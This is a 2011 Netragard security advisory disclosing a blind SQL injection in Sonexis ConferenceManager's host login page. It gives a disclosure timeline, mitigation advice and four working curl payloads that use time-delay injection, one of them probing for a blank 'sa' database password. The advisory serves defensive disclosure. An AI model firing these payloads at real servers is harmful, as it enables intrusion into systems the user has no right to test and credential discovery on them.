*************************** NETRAGARD ADVISORY ************************ http://www.netragard.com Research Driven Penetration Testing [POSTING NOTICE] -------------------------------------------------------------------------- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. The advisory can be found on the Netragard website at http://www.netragard.com/ For more information about Netragard visit http://www.netragard.com [Advisory Information] -------------------------------------------------------------------------- Contact : Adriel T. Desautels Advisory ID : NETRAGARD-20110910 (Corrected) Researcher : Kevin Finisterre & Team Product Name : Sonexis ConferenceManager Product Version : 9.3.14.0 (Tested On) Vendor Name : Sonexix Technology, Inc. Type of Vulnerability : Blind SQL Injection Impact : Critical Date Discovered : 01/19/2011 Vendor Notified : 01/26/2011 [Notes About This Advisory] -------------------------------------------------------------------------- Netragard's team discovered and exploited this vulnerability on January 19th 2011 during the delivery of research based penetration testing services. Netragard notified the vendor about this vulnerability on January 26th 2011. Netragard did not receive any communications back from Sonexis after initial notification. According to an advisory published by Solutionary, Solutionary discovered this same vulnerability on 01/27/2011. Solutionary notified Sonexis of the vulnerability on 02/18/2011 and received a vendor response back on 03/02/2011. Solutionary published a low detail advisory for this issue on 04/06/2011. It is Netragard's policy to refrain from publishing vulnerabilities until after methods for remediation have been created/provided. Exceptions to this policy are made in the event that vendors are non-responsive or in the event that the vulnerability becomes public knowledge. [Product Description] -------------------------------------------------------------------------- "The Sonexis ConferenceManager offers unbeatable value. Our high-quality audio platform is recognized for its ease-of-use, security, and cost-effectiveness — and it offers a comprehensive set of integrated Web conferencing capabilities. Better still, our unique architecture allows you unlimited flexibility. You're never more than a license key away from increasing users, adding Web functionality, or changing from one protocol to another. Simply put, it's the best thing to happen to conferencing." Taken From: http://www.sonexis.com/products/product_details.asp [Technical Summary] -------------------------------------------------------------------------- The Sonexis ConferenceManager does not adhere to best practices as defined by the Open Web Application Security Project (OWASP), the de facto standard for Web Application Security. Specifically, the Sonexis ConferenceManager fails the OWASP Data Validation Criterion as well as others that are not discussed in this advisory. This advisory discloses details about a Blind SQL Injection vulnerability that was discovered by Netragard during the delivery of research driven penetration testing services. Successful exploitation of this vulnerability enables the attacker to take full control of the affected system. Netragard has created and will provide Proof of Concept code for this vulnerability shortly after the publication of this Advisory. Netragard has not received any information from the vendor since initial notification. As of the time of the authoring of this Advisory no official vendor patches have been made public. Netragard has provided methods for mitigation in this advisory. For more information about OWASP criterion please visit the URL Below: --> https://www.owasp.org/index.php/Category:Vulnerability <-- [Technical Details] -------------------------------------------------------------------------- The tests shown below can be used to determine if your Sonexis ConferenceManager is vulnerable. Test Environment: ----------------- web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Microsoft SQL Server 2000 --- TEST 1 --- Validated SQL command execution with the "wait+for+delay+'0:0:3'--" SQL command. If command execution is a success then time should return a "real" value of roughly 3 seconds. netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:3'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1 real 0m3.281s <--- Command Execution Successful! user 0m0.000s sys 0m0.004s --- END TEST 1 --- --- TEST 2 --- Validated SQL command execution with the "wait+for+delay+'0:0:5'--" SQL command. If command execution is a success then time should return a "real" value of roughly 5 seconds. netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:5'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1 real 0m5.277s <--- Command Execution Successful! user 0m0.001s sys 0m0.003s --- END TEST 2 --- --- TEST 3 --- Validated SQL command execution with the "waitfor+delay+'0:0:10'--" SQL command. If command execution is a success then time should return a "real" value of roughly 10 seconds. netragard:~$ time curl -d "txtConferenceID=1'+waitfor+delay+'0:0:10'--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1 real 0m10.280s <--- Command Execution Successful! user 0m0.002s sys 0m0.004s --- END TEST 3 --- --- TEST 4 --- This test is an example of how to check for a blank "sa" password in the MsSQL Database. If the password is set then there will be no delay in server response. If the password is not set, then there will be a 10 second delay. netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1 real 0m0.305s <-- Password is set (no delay). user 0m0.003s sys 0m0.001s netragard:~$ time curl -d "txtConferenceID=1';if (SELECT 1 from OPENROWSET('SQLoledb','server=127.0.0.1;uid=sa;pwd=', 'select 1')) = 1 waitfor+delay'0:0:10';--" "http://xxx.xxx.xxx.xxx/login/hostlogin.asp" >/dev/null 2>&1 real 0m10.101s <-- Password is not set (delay). user 0m0.002s sys 0m0.003s --- END TEST 4 --- [Impact] -------------------------------------------------------------------------- Exploitation Difficulty : Trivial Risk : Complete System Compromise, Distributed Metastasis, Access To Sensitive Data, etc. [Proof Of Concept] -------------------------------------------------------------------------- Netragard created a Proof of Concept exploit for this vulnerability that will be published on Netragard's website shortly after the release of this advisory. [Vendor Status and Chronology] -------------------------------------------------------------------------- 01/19/2011 - Vulnerability Discovered and Exploited by Netragard, LLC. 01/26/2011 - Vendor Notified of the Vulnerability by Netragard, LLC. 01/27/2011 - Vulnerability Discovered by Solutionary. 02/18/2011 - Vendor Notified of the Vulnerability by Solutionary. 03/02/2011 - Vendor Responds to Solutionary. 04/06/2011 - Solutionary publishes a low detail advisory with no mitigation. 04/10/2011 - Netragard publishes high detail advisory with mitigation. [Mitigation] -------------------------------------------------------------------------- This vulnerability can be mitigated by filtering application requests with a Web Application Firewall. Further mitigation can be accomplished with custom filtering done through the Web Server configuration. Note: Mitigation does not constitute a proper fix. If an attacker is able to circumvent mitigation techniques then exploitation is still possible. An example of Web Application Firewall subversion can be found at the following URL: http://pentest.netragard.com/?p=10 [Solution] -------------------------------------------------------------------------- Vendor must perform a review of the Sonexis ConferenceManager source code and ensure that it adheres to the OWASP criterion. [Disclaimer] ------------------------http://www.netragard.com-------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business.